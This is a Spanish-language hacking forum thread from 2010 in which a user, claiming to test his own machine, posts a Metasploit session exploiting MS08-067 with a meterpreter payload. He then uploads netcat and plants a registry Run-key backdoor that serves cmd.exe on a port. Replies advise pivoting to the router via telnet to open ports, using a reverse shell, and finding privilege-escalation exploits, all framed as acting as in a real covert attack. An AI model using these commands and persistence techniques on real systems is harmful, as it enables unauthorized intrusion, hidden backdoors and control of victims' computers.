Duda sobre re-crear aceso a mi Backdoor

Iniciado por Debci, 31 Julio 2010, 11:17 AM

0 Miembros y 1 Visitante están viendo este tema.

Debci

Hola a todos, recientemente practicando PenTest con un equipo remoto (es mio si...) consegui explotarle una vulnerabilidad y bindearme a una reverse tcp meterpreter, una vez en su equipo, me dispuse a asegurarme el aceso, lo hice de la siguiente manera (basandome en lo que Kamsky explicó):

               ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 7 days ago (2009.12.10)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.3      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     xx.xx.xx.xx      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:1934 -> xx.xx.xx.xx:4444)

meterpreter >


Una vez dentro me dispuse a subir el netcat.exe y ponerlo con la shell en un puerto y escribirlo en el registro:

meterpreter > upload /root/tools/nc.exe C:\\Windows\\System32\\
[*] uploading  : /root/tools/nc.exe -> C:\Windows\System32\
[*] uploaded   :  /root/tools/nc.exe-> C:\Windows\System32\\nc.exe
meterpreter >


Una vez subido y que se puede ejecutar en la consola sin ruta especifica:

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsCore -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter >


Lo pondrá a la espera en el puerto 1234, pero si ese puerto no esta mapeado en el router como diablos voy a conectarme a la backdoor?Puedo de alguna manera abrir puertos en su router? Estuve pensando en subirle un servidor VNC pero es muy cutre, y se daria cuenta de que estan trasteando(en el caso de que fuese una situación real...).

A expensas de que muchos van a decir que como es tu router abrelos tu, les diré que en una situación real no se puede hacer eso, y quiero hacerlo todo como si una real se tratase!

Saludos y gracias a todos!

kamsky

si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci

Cita de: kamsky en 31 Julio 2010, 12:36 PM
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
asi lo he intentado pero ahora mi supuesta victima no tengo permisos de administracion :S
Ni puedo escribir registro ni nada (lo del reverse ya he visto que puedo, es efectivo)
Y con lo que se no puedo escalar privilegios remotamente...

Alguna idea?

Saludos

kamsky

tienes acceso al router desde el PC??

busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes ;)
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci

Cita de: kamsky en 31 Julio 2010, 12:46 PM
tienes acceso al router desde el PC??

busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes ;)
Bien me pongo a ello, aceso al router? Mmm desde consola?

Saludos

kamsky

si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:

   Main Menu

1.  ADSL Link State
2.  LAN
3.  WAN
4.  DNS Server
5.  Route Setup
6.  NAT
7.  Firewall
8.  Quality Of Service
9.  Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci

#6
Cita de: kamsky en 31 Julio 2010, 12:52 PM
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:

  Main Menu

1.  ADSL Link State
2.  LAN
3.  WAN
4.  DNS Server
5.  Route Setup
6.  NAT
7.  Firewall
8.  Quality Of Service
9.  Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

Entiendo...
EDITO:
Le hago una conexion a la puerta de enlace del router?
Ahora he buscado exploits para escalar privilegios, he leido sobre el ms10_15 pero no hay nada especifico sobre el, solamente lo que hace...
He visto metodos, pero tendria que tener aceso fisico al pc para escalarlos, otra posibilidad es crackear la pass de admin pero si me deslogueo por consola pierdo conexion con el meterpreter.

He pensado que en una situacion real se podria hacer con ingenieria social, pero descarto dicha posiblidad.

Saludos

kamsky

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Debci


kamsky

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!